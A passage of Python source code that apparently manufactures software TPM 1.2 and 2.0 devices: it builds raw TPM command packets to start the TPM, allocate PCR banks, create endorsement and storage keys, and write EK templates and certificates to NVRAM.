0x0028\nTPM2_ALG_NULL = 0x0010\nTPM2_ALG_SM3 = 0x0012\nTPM2_ALG_ECC = 0x0023\nTPM2_ALG_CFB = 0x0043\n\nTPM2_CAP_PCRS = 0x00000005\n\nTPM2_ECC_NIST_P384 = 0x0004\n\nTPMA_NV_PLATFORMCREATE = 0x40000000\nTPMA_NV_AUTHREAD = 0x40000\nTPMA_NV_NO_DA = 0x2000000\nTPMA_NV_PPWRITE = 0x1\nTPMA_NV_PPREAD = 0x10000\nTPMA_NV_OWNERREAD = 0x20000\nTPMA_NV_WRITEDEFINE = 0x2000\n\n# Use standard EK Cert NVRAM, EK and SRK handles per IWG spec.\n# \"TCG TPM v2.0 Provisioning Guide\"; Version 1.0, Rev 1.0, March 15, 2017\n# Table 2\nTPM2_NV_INDEX_RSA2048_EKCERT = 0x01c00002\nTPM2_NV_INDEX_RSA2048_EKTEMPLATE = 0x01c00004\nTPM2_NV_INDEX_RSA3072_HI_EKCERT = 0x01c0001c\nTPM2_NV_INDEX_RSA3072_HI_EKTEMPLATE = 0x01c0001d\n# For ECC follow \"TCG EK Credential Profile For TPM Family 2.0; Level 0\"\n# Specification Version 2.1; Revision 13; 10 December 2018\nTPM2_NV_INDEX_PLATFORMCERT = 0x01c08000\n\nTPM2_NV_INDEX_ECC_SECP384R1_HI_EKCERT = 0x01c00016\nTPM2_NV_INDEX_ECC_SECP384R1_HI_EKTEMPLATE = 0x01c00017\n\nTPM2_EK_RSA_HANDLE = 0x81010001\nTPM2_EK_RSA3072_HANDLE = 0x8101001c\nTPM2_EK_ECC_SECP384R1_HANDLE = 0x81010016\nTPM2_SPK_HANDLE = 0x81000001\n\nNONCE_EMPTY = struct.pack('>H', 0)\nNONCE_RSA2048 = struct.pack('>H256s', 0x100, ('\\0' * 0x100).encode())\nNONCE_RSA3072 = struct.pack('>H384s', 0x180, ('\\0' * 0x180).encode())\nNONCE_ECC_384 = struct.pack('>H48s', 0x30, ('\\0' * 0x30).encode())\n\nPCR_BANKS_TO_NAMES = {\n TPM2_ALG_SHA1: \"sha1\",\n TPM2_ALG_SHA256: \"sha256\",\n TPM2_ALG_SHA384: \"sha384\",\n TPM2_ALG_SHA512: \"sha512\",\n TPM2_ALG_SM3: \"sm3-256\",\n TPM2_ALG_SHA3_256: \"sha3-256\",\n TPM2_ALG_SHA3_384: \"sha3-384\",\n TPM2_ALG_SHA3_512: \"sha3-512\",\n}\n\nBANK_NAMES_TO_ALGID = {\n \"sha1\": TPM2_ALG_SHA1,\n \"sha256\": TPM2_ALG_SHA256,\n \"sha384\": TPM2_ALG_SHA384,\n \"sha512\": TPM2_ALG_SHA512,\n \"sm3-256\": TPM2_ALG_SM3,\n \"sha3-256\": TPM2_ALG_SHA3_256,\n \"sha3-384\": TPM2_ALG_SHA3_384,\n \"sha3-512\": TPM2_ALG_SHA3_512,\n}\n\n\nclass Swtpm2(Swtpm):\n \"\"\" Class for manufacturing a swtpm TPM 2 \"\"\"\n\n def __init__(self, swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass):\n \"\"\" Class constructor\n swtpm_exec_l is a list like [\"swtpm\", \"socket\"]\n \"\"\"\n\n super(Swtpm2, self).__init__(swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass,\n is_tpm2=True)\n\n def shutdown(self):\n \"\"\" Shut down the TPM 2 \"\"\"\n\n fmt = \">HII H\"\n req = struct.pack(fmt,\n TPM2_ST_NO_SESSIONS, struct.calcsize(fmt), TPM2_CC_SHUTDOWN,\n TPM2_SU_CLEAR)\n\n _, ret = self.transfer(req, \"TPM2_Shutdown\")\n return ret\n\n def run_swtpm_bios(self):\n \"\"\" Startup the TPM 2 \"\"\"\n\n fmt = '>HII H'\n req = struct.pack(fmt,\n TPM2_ST_NO_SESSIONS, struct.calcsize(fmt), TPM2_CC_STARTUP,\n TPM2_SU_CLEAR)\n _, ret = self.transfer(req, \"TPM2_Startup\")\n return ret\n\n def get_all_pcr_banks(self):\n \"\"\" Get all available PCR banks \"\"\"\n\n fmt = '>HII III'\n req = struct.pack(fmt,\n TPM2_ST_NO_SESSIONS, struct.calcsize(fmt), TPM2_CC_GETCAPABILITY,\n TPM2_CAP_PCRS, 0, 64)\n rsp, ret = self.transfer(req, \"TPM2_GetCapability\")\n if ret != 0:\n return [], 1\n\n count = struct.unpack('>H', rsp[17:19])[0]\n offset = 19\n\n res = []\n for _ in range(count):\n bank, length = struct.unpack('>HB', rsp[offset:offset+3])\n name = PCR_BANKS_TO_NAMES[bank]\n if name:\n res.append(name)\n else:\n res.append('%02x' % bank)\n offset += 2 + 1 + length\n\n return res, 0\n\n def set_active_pcr_banks(self, pcr_banks, all_pcr_banks):\n \"\"\" Set the list of active PCR banks to the one the user wants \"\"\"\n\n 
pcrselects = \"\".encode()\n count = 0\n active = []\n\n # enable the ones the user wants\n for pcr_bank in pcr_banks:\n if pcr_bank not in all_pcr_banks:\n # Skip if not even available\n continue\n try:\n hashalg = BANK_NAMES_TO_ALGID[pcr_bank]\n except KeyError:\n continue\n\n active.insert(0, pcr_bank)\n pcrselects += struct.pack('>H BBBB', hashalg, 3, 0xff, 0xff, 0xff)\n\n #print(\"activate hashalg = %d\\n\" % hashalg)\n count += 1\n\n if len(active) == 0:\n logerr(self.logfile,\n \"No PCR banks could be allocated. None of the selected algorithms are \"\n \"supported.\\n\")\n return [], 1\n\n # disable the rest\n for pcr_bank in all_pcr_banks:\n if pcr_bank in pcr_banks:\n # Skip if to activate\n continue\n\n try:\n hashalg = BANK_NAMES_TO_ALGID[pcr_bank]\n except KeyError:\n continue\n\n #print(\"deactivate hashalg = %d\\n\" % hashalg)\n pcrselects += struct.pack('>H BBBB', hashalg, 3, 0, 0, 0)\n count += 1\n\n authblock = struct.pack('>I HBH', TPM2_RS_PW, 0, 0, 0)\n fmt = '>HII I I%ds I %ds' % (len(authblock), len(pcrselects))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_PCR_ALLOCATE,\n TPM2_RH_PLATFORM,\n len(authblock), authblock,\n count,\n pcrselects)\n\n _, ret = self.transfer(req, \"TPM2_PCR_Allocate\")\n\n return active, ret\n\n def evictcontrol(self, curr_handle, perm_handle):\n \"\"\" Make object at the curr_handler permanent with the perm_handle \"\"\"\n\n authblock = struct.pack('>IHBH', TPM2_RS_PW, 0, 0, 0)\n\n fmt = '>HII II I%ds I' % len(authblock)\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_EVICTCONTROL,\n TPM2_RH_OWNER, curr_handle,\n len(authblock), authblock,\n perm_handle)\n\n _, ret = self.transfer(req, \"TPM2_EvictControl\")\n return ret\n\n def createprimary_ek_rsa(self, rsa_keysize, allowsigning, decryption):\n \"\"\" Create an RSA Ek \"\"\"\n\n if rsa_keysize == 2048:\n authpolicy = b'\\x83\\x71\\x97\\x67\\x44\\x84\\xb3\\xf8\\x1a\\x90\\xcc\\x8d' \\\n b'\\x46\\xa5\\xd7\\x24\\xfd\\x52\\xd7\\x6e\\x06\\x52\\x0b\\x64' \\\n b'\\xf2\\xa1\\xda\\x1b\\x33\\x14\\x69\\xaa'\n keyflags = 0\n symkeylen = 128\n havenonce = True\n addlen = 0\n elif rsa_keysize == 3072:\n authpolicy = b'\\xB2\\x6E\\x7D\\x28\\xD1\\x1A\\x50\\xBC\\x53\\xD8\\x82\\xBC' \\\n b'\\xF5\\xFD\\x3A\\x1A\\x07\\x41\\x48\\xBB\\x35\\xD3\\xB4\\xE4' \\\n b'\\xCB\\x1C\\x0A\\xD9\\xBD\\xE4\\x19\\xCA\\xCB\\x47\\xBA\\x09' \\\n b'\\x69\\x96\\x46\\x15\\x0F\\x9F\\xC0\\x00\\xF3\\xF8\\x0E\\x12'\n keyflags = 0x40\n symkeylen = 256\n havenonce = False\n addlen = 16\n\n if allowsigning and decryption:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # adminWithPolicy, sign, decrypt\n keyflags = keyflags | 0x000600b2\n # symmetric: TPM_ALG_NULL\n symkeydata = struct.pack(\">H\", TPM2_ALG_NULL)\n off = 72 + addlen\n elif allowsigning:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # adminWithPolicy, sign\n keyflags = keyflags | 0x000400b2\n # symmetric: TPM_ALG_NULL\n symkeydata = struct.pack(\">H\", TPM2_ALG_NULL)\n off = 72 + addlen\n else:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # adminWithPolicy, restricted, decrypt\n keyflags = keyflags | 0x000300b2\n # symmetric: TPM_ALG_AES, 128bit or 256bit, TPM_ALG_CFB\n symkeydata = struct.pack(\">HHH\", TPM2_ALG_AES, symkeylen, TPM2_ALG_CFB)\n off = 76 + addlen\n\n return self._createprimary_rsa(TPM2_RH_ENDORSEMENT, keyflags, symkeydata, authpolicy,\n rsa_keysize, havenonce, off)\n\n def _createprimary_rsa(self, primaryhandle, keyflags, symkeydata, authpolicy,\n rsa_keysize, 
havenonce, off):\n \"\"\" Create an RSA key with the given parameters \"\"\"\n\n if rsa_keysize == 2048:\n nonce = NONCE_RSA2048\n hashalg = TPM2_ALG_SHA256\n elif rsa_keysize == 3072:\n if not havenonce:\n nonce = NONCE_EMPTY\n else:\n nonce = NONCE_RSA3072\n hashalg = TPM2_ALG_SHA384\n else:\n logerr(self.logfile, \"Unsupported keysize %d\\n\" % rsa_keysize)\n return b'', \"\", 0, 1\n\n authblock = struct.pack('>IHBH', TPM2_RS_PW, 0, 0, 0)\n\n fmt = '>HHI H%ds %ds HH I %ds' % \\\n (len(authpolicy), len(symkeydata), len(nonce))\n public = struct.pack(fmt,\n TPM2_ALG_RSA, hashalg, keyflags,\n len(authpolicy), authpolicy,\n symkeydata,\n TPM2_ALG_NULL, rsa_keysize,\n 0,\n nonce)\n ek_template = public\n\n fmt = \">HII I I%ds HI H%ds IH\" % (len(authblock), len(public))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_CREATEPRIMARY,\n primaryhandle,\n len(authblock), authblock,\n 4, 0,\n len(public), public,\n 0, 0)\n rsp, ret = self.transfer(req, \"TPM2_CreatePrimary\")\n if ret != 0:\n return b'', \"\", 0, 1\n\n handle = struct.unpack(\">I\", rsp[10:14])[0]\n\n modlen = struct.unpack(\">H\", rsp[off:off+2])[0]\n if modlen != rsa_keysize >> 3:\n logerr(self.logfile, \"RSA key: Getting modulus from wrong offset %d\\n\" % off)\n return b'', \"\", 0, 1\n off += 2\n ekparam = struct.unpack(\">%ds\" % modlen, rsp[off:off+modlen])[0].hex()\n\n return ek_template, ekparam, handle, 0\n\n def _createprimary_ecc(self, primaryhandle, keyflags, symkeydata, authpolicy,\n curveid, hashalg, nonce, off):\n \"\"\" Create an ECC key with the given parameters \"\"\"\n\n authblock = struct.pack('>IHBH', TPM2_RS_PW, 0, 0, 0)\n\n fmt = '>HHI H%ds %ds HH H %ds%ds' % \\\n (len(authpolicy), len(symkeydata), len(nonce), len(nonce))\n public = struct.pack(fmt,\n TPM2_ALG_ECC, hashalg, keyflags,\n len(authpolicy), authpolicy,\n symkeydata,\n TPM2_ALG_NULL, curveid,\n TPM2_ALG_NULL,\n nonce, nonce)\n ek_template = public\n\n fmt = '>HII I I%ds HI H%ds IH' % (len(authblock), len(public))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_CREATEPRIMARY,\n primaryhandle,\n len(authblock), authblock,\n 4, 0,\n len(public), public,\n 0, 0)\n rsp, ret = self.transfer(req, \"TPM2_CreatePrimary\")\n if ret != 0:\n return b'', \"\", 0, 1\n\n handle = struct.unpack('>I', rsp[10:14])[0]\n\n if curveid == TPM2_ECC_NIST_P384:\n exp_ksize = 48\n cid = \"secp384r1\"\n else:\n logerr(self.logfile, \"Unknown curveid 0x%x\\n\" % curveid)\n return b'', \"\", 0, 1\n\n ksize1 = struct.unpack('>H', rsp[off:off+2])[0]\n off2 = off + 2 + ksize1\n ksize2 = struct.unpack('>H', rsp[off2:off2+2])[0]\n\n if ksize1 != exp_ksize or ksize2 != exp_ksize:\n logerr(self.logfile, \"ECC: Getting key parameters from wrong offset\\n\")\n return b'', \"\", 0, 1\n\n off += 2\n xparam = struct.unpack(\">%ds\" % ksize1, rsp[off:off+ksize1])[0]\n off2 += 2\n yparam = struct.unpack(\">%ds\" % ksize2, rsp[off2:off2+ksize2])[0]\n\n ekparam = \"x=%s,y=%s,id=%s\" % (xparam.hex(), yparam.hex(), cid)\n\n return ek_template, ekparam, handle, 0\n\n def createprimary_spk_ecc_nist_p384(self):\n \"\"\" Create a NIST p384 ECC SPK \"\"\"\n\n keyflags = 0x00030472\n symkeydata = struct.pack('>HHH', TPM2_ALG_AES, 256, TPM2_ALG_CFB)\n authpolicy = b''\n off = 42\n\n return self._createprimary_ecc(TPM2_RH_OWNER, keyflags, symkeydata, authpolicy,\n TPM2_ECC_NIST_P384, TPM2_ALG_SHA384, NONCE_ECC_384, off)\n\n def createprimary_spk_rsa(self, rsa_keysize):\n \"\"\" Create a primary RSA key with the given keysize \"\"\"\n\n keyflags = 
0x00030472\n authpolicy = ''.encode()\n\n if rsa_keysize == 2048:\n symkeylen = 128\n elif rsa_keysize == 3072:\n symkeylen = 256\n symkeydata = struct.pack('>HHH', TPM2_ALG_AES, symkeylen, TPM2_ALG_CFB)\n off = 44\n\n return self._createprimary_rsa(TPM2_RH_OWNER, keyflags, symkeydata, authpolicy,\n rsa_keysize, True, off)\n\n def create_spk(self, isecc, rsa_keysize):\n \"\"\" Create either an ECC or RSA storage primary key \"\"\"\n\n if isecc:\n _, _, handle, ret = self.createprimary_spk_ecc_nist_p384()\n else:\n _, _, handle, ret = self.createprimary_spk_rsa(rsa_keysize)\n\n if ret != 0:\n return 1\n\n ret = self.evictcontrol(handle, TPM2_SPK_HANDLE)\n if ret == 0:\n logit(self.logfile,\n \"Successfully created storage primary key with handle 0x%x.\\n\" % TPM2_SPK_HANDLE)\n\n return ret\n\n def createprimary_ek_ecc_nist_p384(self, allowsigning, decryption):\n \"\"\" Create en ECC EK key that may be allowed to sign and/or decrypt \"\"\"\n\n if allowsigning and decryption:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # userWithAuth, adminWithPolicy, sign, decrypt\n keyflags = 0x000600f2\n # symmetric: TPM_ALG_NULL\n symkeydata = struct.pack(\">H\", TPM2_ALG_NULL)\n off = 86\n elif allowsigning:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # userWithAuth, adminWithPolicy, sign\n keyflags = 0x000400f2\n # symmetric: TPM_ALG_NULL\n symkeydata = struct.pack(\">H\", TPM2_ALG_NULL)\n off = 86\n else:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # userWithAuth, adminWithPolicy, restricted, decrypt\n keyflags = 0x000300f2\n # symmetric: TPM_ALG_AES, 256bit, TPM_ALG_CFB\n symkeydata = struct.pack(\">HHH\", TPM2_ALG_AES, 256, TPM2_ALG_CFB)\n off = 90\n\n\t# authPolicy from Ek Credential Profile; Spec v 2.1; rev12; p. 
43\n authpolicy = b'\\xB2\\x6E\\x7D\\x28\\xD1\\x1A\\x50\\xBC\\x53\\xD8\\x82\\xBC' \\\n b'\\xF5\\xFD\\x3A\\x1A\\x07\\x41\\x48\\xBB\\x35\\xD3\\xB4\\xE4' \\\n b'\\xCB\\x1C\\x0A\\xD9\\xBD\\xE4\\x19\\xCA\\xCB\\x47\\xBA\\x09' \\\n b'\\x69\\x96\\x46\\x15\\x0F\\x9F\\xC0\\x00\\xF3\\xF8\\x0E\\x12'\n\n ek_template, ekparam, handle, ret = \\\n self._createprimary_ecc(TPM2_RH_ENDORSEMENT, keyflags, symkeydata, authpolicy,\n TPM2_ECC_NIST_P384, TPM2_ALG_SHA384, NONCE_EMPTY, off)\n if ret != 0:\n logerr(self.logfile, \"create_spk_ecc failed\\n\")\n\n return ek_template, ekparam, handle, ret\n\n def create_ek(self, isecc, rsa_keysize, allowsigning, decryption, lock_nvram):\n \"\"\" Create an ECC or RSA EK \"\"\"\n\n if isecc:\n tpm2_ek_handle = TPM2_EK_ECC_SECP384R1_HANDLE\n keytype = \"ECC\"\n nvindex = TPM2_NV_INDEX_ECC_SECP384R1_HI_EKTEMPLATE\n else:\n if rsa_keysize == 2048:\n tpm2_ek_handle = TPM2_EK_RSA_HANDLE\n nvindex = TPM2_NV_INDEX_RSA2048_EKTEMPLATE\n elif rsa_keysize == 3072:\n tpm2_ek_handle = TPM2_EK_RSA3072_HANDLE\n nvindex = TPM2_NV_INDEX_RSA3072_HI_EKTEMPLATE\n keytype = \"RSA %d\" % rsa_keysize\n\n if isecc:\n ek_template, ekparam, handle, ret = \\\n self.createprimary_ek_ecc_nist_p384(allowsigning, decryption)\n else:\n ek_template, ekparam, handle, ret = \\\n self.createprimary_ek_rsa(rsa_keysize, allowsigning, decryption)\n\n if ret == 0:\n ret = self.evictcontrol(handle, tpm2_ek_handle)\n if ret != 0:\n logerr(self.logfile, \"create_ek failed\\n\")\n return \"\", 1\n\n logit(self.logfile,\n \"Successfully created %s EK with handle 0x%x.\\n\" % (keytype, tpm2_ek_handle))\n\n if allowsigning:\n nvindexattrs = TPMA_NV_PLATFORMCREATE | \\\n\t\tTPMA_NV_AUTHREAD | \\\n\t\tTPMA_NV_OWNERREAD | \\\n\t\tTPMA_NV_PPREAD | \\\n\t\tTPMA_NV_PPWRITE | \\\n\t\tTPMA_NV_NO_DA | \\\n\t\tTPMA_NV_WRITEDEFINE\n ret = self.write_nvram(nvindex, nvindexattrs, ek_template, lock_nvram, \"EK template\")\n if ret == 0:\n logit(self.logfile,\n \"Successfully created NVRAM area 0x%x for %s EK template.\\n\" %\n (nvindex, keytype))\n\n return ekparam, ret\n\n def nv_definespace(self, nvindex, nvindexattrs, size):\n \"\"\" Define an NVIndex with attributes and given size \"\"\"\n\n authblock = struct.pack(\">IHBH\", TPM2_RS_PW, 0, 0, 0)\n\n nvpublic = struct.pack('>IHI H H',\n nvindex, TPM2_ALG_SHA256, nvindexattrs,\n 0,\n size)\n\n fmt = \">HII I I%ds H H%ds\" % (len(authblock), len(nvpublic))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_NV_DEFINESPACE,\n TPM2_RH_PLATFORM,\n len(authblock), authblock,\n 0,\n len(nvpublic), nvpublic)\n\n _, ret = self.transfer(req, \"TPM2_NV_DefineSpace\")\n return ret\n\n def nv_write(self, nvindex, data):\n \"\"\" Write the data into the given NVIndex \"\"\"\n\n authblock = struct.pack(\">IHBH\", TPM2_RS_PW, 0, 0, 0)\n\n offset = 0\n stepsize = 1024\n\n while offset < len(data):\n if offset + stepsize < len(data):\n buf = data[offset : offset + stepsize]\n else:\n buf = data[offset : len(data)]\n\n fmt = \">HII II I%ds H%dsH\" % (len(authblock), len(buf))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_NV_WRITE,\n TPM2_RH_PLATFORM, nvindex,\n len(authblock), authblock,\n len(buf), buf, offset)\n\n _, ret = self.transfer(req, \"TPM2_NV_Write\")\n if ret != 0:\n return 1\n\n offset += stepsize\n\n return 0\n\n def nv_writelock(self, nvindex):\n \"\"\" Lock the given index \"\"\"\n\n authblock = struct.pack(\">IHBH\", TPM2_RS_PW, 0, 0, 0)\n\n fmt = \">HII II I%ds\" % (len(authblock))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, 
struct.calcsize(fmt), TPM2_CC_NV_WRITELOCK,\n TPM2_RH_PLATFORM, nvindex,\n len(authblock), authblock)\n\n _, ret = self.transfer(req, \"TPM2_NV_WriteLock\")\n return ret\n\n def write_nvram(self, nvindex, nvindexattrs, data, lock_nvram, purpose):\n \"\"\" Define NVRAM space, write data to it and lock it if wanted \"\"\"\n\n ret = self.nv_definespace(nvindex, nvindexattrs, len(data))\n if ret != 0:\n logerr(self.logfile, \"Could not create NVRAM area 0x%x for %s.\\n\" % (nvindex, purpose))\n return 1\n\n ret = self.nv_write(nvindex, data)\n if ret != 0:\n logerr(self.logfile,\n \"Could not write %s into NVRAM area 0x%x.\\n\" % (purpose, nvindex))\n return 1\n\n if lock_nvram:\n ret = self.nv_writelock(nvindex)\n if ret != 0:\n logerr(self.logfile, \"Could not lock EK template NVRAM area 0x%x.\\n\" % nvindex)\n return 1\n\n return ret\n\n def write_ek_cert_nvram(self, isecc, rsa_keysize, lock_nvram, ekcert):\n \"\"\" Write the given ekcert into an NVRAM area appropriate for the key type and size \"\"\"\n\n if not isecc:\n if rsa_keysize == 2048:\n nvindex = TPM2_NV_INDEX_RSA2048_EKCERT\n elif rsa_keysize == 3072:\n nvindex = TPM2_NV_INDEX_RSA3072_HI_EKCERT\n keytype = \"RSA %d\" % rsa_keysize\n else:\n nvindex = TPM2_NV_INDEX_ECC_SECP384R1_HI_EKCERT\n keytype = \"ECC\"\n\n nvindexattrs = TPMA_NV_PLATFORMCREATE | \\\n TPMA_NV_AUTHREAD | \\\n TPMA_NV_OWNERREAD | \\\n TPMA_NV_PPREAD | \\\n TPMA_NV_PPWRITE | \\\n TPMA_NV_NO_DA | \\\n TPMA_NV_WRITEDEFINE\n ret = self.write_nvram(nvindex, nvindexattrs, ekcert, lock_nvram, \"EK Certificate\")\n if ret == 0:\n logit(self.logfile,\n \"Successfully created NVRAM area 0x%x for %s EK certificate.\\n\" %\n (nvindex, keytype))\n else:\n logerr(self.logfile,\n \"Could not create NVRAM area 0x%x for %s EK certificate.\\n\" %\n (nvindex, keytype))\n return ret\n\n def write_platform_cert_nvram(self, lock_nvram, platformcert):\n \"\"\" Write the platform certificate into an NVRAM area \"\"\"\n\n nvindex = TPM2_NV_INDEX_PLATFORMCERT\n nvindexattrs = TPMA_NV_PLATFORMCREATE | \\\n TPMA_NV_AUTHREAD | \\\n TPMA_NV_OWNERREAD | \\\n TPMA_NV_PPREAD | \\\n TPMA_NV_PPWRITE | \\\n TPMA_NV_NO_DA | \\\n TPMA_NV_WRITEDEFINE\n ret = self.write_nvram(nvindex, nvindexattrs, platformcert, lock_nvram,\n \"Platform Certificate\")\n if ret == 0:\n logit(self.logfile,\n \"Successfully created NVRAM area 0x%x for platform certificate.\\n\" % nvindex)\n else:\n logerr(self.logfile,\n \"Could not create NVRAM area 0x%x for platform certificate.\\n\" % nvindex)\n return ret\n\n\n#\n# TPM 1.2 support\n#\n\nTPM_TAG_RQU_COMMAND = 0x00c1\nTPM_TAG_RQU_AUTH1_COMMAND = 0x00c2\n\nTPM_ORD_OIAP = 0x0000000A\nTPM_ORD_OSAP = 0x0000000B\nTPM_ORD_TAKE_OWNERSHIP = 0x0000000D\nTPM_ORD_OWNER_CLEAR = 0x0000005B\nTPM_ORD_PHYSICAL_ENABLE = 0x0000006F\nTPM_ORD_PHYSICAL_SET_DEACTIVATED = 0x00000072\nTPM_ORD_STARTUP = 0x00000099\nTPM_ORD_NV_DEFINE_SPACE = 0x000000CC\nTPM_ORD_NV_WRITE_VALUE = 0x000000CD\nTSC_ORD_PHYSICAL_PRESENCE = 0x4000000A\n\nTPM_ST_CLEAR = 0x0001\n\nTPM_PHYSICAL_PRESENCE_CMD_ENABLE = 0x0020\nTPM_PHYSICAL_PRESENCE_PRESENT = 0x0008\n\nTPM_ALG_RSA = 0x00000001\n\nTPM_KEY_STORAGE = 0x0011\n\nTPM_AUTH_ALWAYS = 0x01\n\nTPM_PID_OWNER = 0x0005\n\nTPM_ES_RSAESOAEP_SHA1_MGF1 = 0x0003\nTPM_SS_NONE = 0x0001\n\nTPM_TAG_PCR_INFO_LONG = 0x0006\nTPM_TAG_NV_ATTRIBUTES = 0x0017\nTPM_TAG_NV_DATA_PUBLIC = 0x0018\nTPM_TAG_KEY12 = 0x0028\n\nTPM_LOC_ZERO = 0x01\nTPM_LOC_ALL = 0x1f\n\nTPM_NV_INDEX_D_BIT = 0x10000000\nTPM_NV_INDEX_EKCERT = 0xF000\nTPM_NV_INDEX_PLATFORMCERT = 0xF002\n\nTPM_NV_INDEX_LOCK = 
0xFFFFFFFF\n\nTPM_NV_PER_OWNERREAD = 0x00020000\nTPM_NV_PER_OWNERWRITE = 0x00000002\n\nTPM_ET_OWNER = 0x02\nTPM_ET_NV = 0x0b\n\nTPM_KH_EK = 0x40000006\n\nclass Swtpm12(Swtpm):\n \"\"\" Class for manufacturing a swtpm TPM 1.2 \"\"\"\n\n def __init__(self, swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass):\n \"\"\" Class constructor\n swtpm_exec_l is a list like [\"swtpm\", \"socket\"]\n \"\"\"\n\n super(Swtpm12, self).__init__(swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass)\n\n def startup(self, startup_type):\n \"\"\" Run TPM_Startup() \"\"\"\n\n fmt = \">HII H\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_STARTUP,\n startup_type)\n\n _, ret = self.transfer(req, \"TPM_Startup\")\n return ret\n\n def tsc_physicalpresence(self, physicalpresence):\n \"\"\" Run TSC_PhysicalPresence \"\"\"\n\n fmt = \">HII H\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TSC_ORD_PHYSICAL_PRESENCE,\n physicalpresence)\n\n _, ret = self.transfer(req, \"TSC_PhysicalPresence\")\n return ret\n\n def physical_enable(self):\n \"\"\" Run TPM_PhysicalEnable \"\"\"\n\n fmt = \">HII\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_PHYSICAL_ENABLE)\n\n _, ret = self.transfer(req, \"TSC_PhysicalEnable\")\n return ret\n\n def physical_set_deactivated(self, state):\n \"\"\" Run TPM_PhysicalSetDeactivated \"\"\"\n\n fmt = \">HI I B\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt),\n TPM_ORD_PHYSICAL_SET_DEACTIVATED,\n state)\n\n _, ret = self.transfer(req, \"TPM_PhysiclaSetDaectivated\")\n return ret\n\n def run_swtpm_bios(self):\n \"\"\" Initialize the swtpm \"\"\"\n\n if self.startup(TPM_ST_CLEAR) or \\\n self.tsc_physicalpresence(TPM_PHYSICAL_PRESENCE_CMD_ENABLE) or \\\n self.tsc_physicalpresence(TPM_PHYSICAL_PRESENCE_PRESENT) or \\\n self.physical_enable() or \\\n self.physical_set_deactivated(0):\n return 1\n return 0\n\n def create_endorsement_key_pair(self):\n \"\"\" Create an endorsement key for the TPM 1.2 \"\"\"\n\n req = b'\\x00\\xc1\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x78\\x38\\xf0\\x30\\x81\\x07\\x2b' \\\n b'\\x0c\\xa9\\x10\\x98\\x08\\xc0\\x4B\\x05\\x11\\xc9\\x50\\x23\\x52\\xc4\\x00\\x00' \\\n b'\\x00\\x01\\x00\\x03\\x00\\x02\\x00\\x00\\x00\\x0c\\x00\\x00\\x08\\x00\\x00\\x00' \\\n b'\\x00\\x02\\x00\\x00\\x00\\x00'\n\n rsp, ret = self.transfer(req, \"TPM_CreateEndorsementKeyPair\")\n if ret != 0:\n return b'', 1\n\n length = struct.unpack(\">I\", rsp[34:38])[0]\n if length != 256:\n logerr(self.logfile, \"Offset to EK Public key is wrong.\\n\")\n return b'', 1\n\n pubek = struct.unpack(\"256s\", rsp[38:38+256])[0]\n\n return pubek, 0\n\n def oiap(self):\n \"\"\" Create an OIAP session \"\"\"\n\n fmt = \">HII\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_OIAP)\n\n rsp, ret = self.transfer(req, \"TPM_OIAP\")\n if ret != 0:\n return b'', 0, 1\n\n authhandle = struct.unpack(\">I\", rsp[10:14])[0]\n nonce_even = struct.unpack(\"20s\", rsp[14:34])[0]\n\n return nonce_even, authhandle, 0\n\n def take_ownership(self, ownerpass_digest, srkpass_digest, pubek):\n \"\"\" Run TPM_TakeOwernship \"\"\"\n\n exponent = int('10001', 16)\n modulus = int(pubek.hex(), 16)\n pubekkey = RSAPublicNumbers(exponent, modulus).public_key(backend=default_backend())\n\n oaep = padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=\"TCPA\".encode()\n )\n enc_owner_auth = pubekkey.encrypt(ownerpass_digest, oaep)\n enc_srk_auth = 
pubekkey.encrypt(srkpass_digest, oaep)\n\n nonce_even, auth_handle, ret = self.oiap()\n if ret != 0:\n return 1\n\n tpm_rsa_key_parms = struct.pack(\">III\",\n 2048, # keyLength\n 2, # numPrimes\n 0) # exponentSize\n tpm_key_parms = struct.pack(\">I HH I%ds\" % (len(tpm_rsa_key_parms)),\n TPM_ALG_RSA, # algorithmId\n TPM_ES_RSAESOAEP_SHA1_MGF1, # encScheme\n TPM_SS_NONE, # sigScheme\n len(tpm_rsa_key_parms), tpm_rsa_key_parms)\n tpm_key12 = struct.pack(\">HH HIB %ds I I I\" %\n (len(tpm_key_parms)),\n TPM_TAG_KEY12, 0,\n TPM_KEY_STORAGE, # keyUsage\n 0, # keyFlags\n TPM_AUTH_ALWAYS, # authDataUsage\n tpm_key_parms,\n 0,\n 0,\n 0)\n fmt_auth = \">I20sB20s\"\n fmt = \">HII H I256s I256s %ds\" % len(tpm_key12)\n nonce_odd = os.urandom(20)\n req = struct.pack(fmt,\n TPM_TAG_RQU_AUTH1_COMMAND,\n struct.calcsize(fmt) + struct.calcsize(fmt_auth),\n TPM_ORD_TAKE_OWNERSHIP,\n TPM_PID_OWNER,\n len(enc_owner_auth), 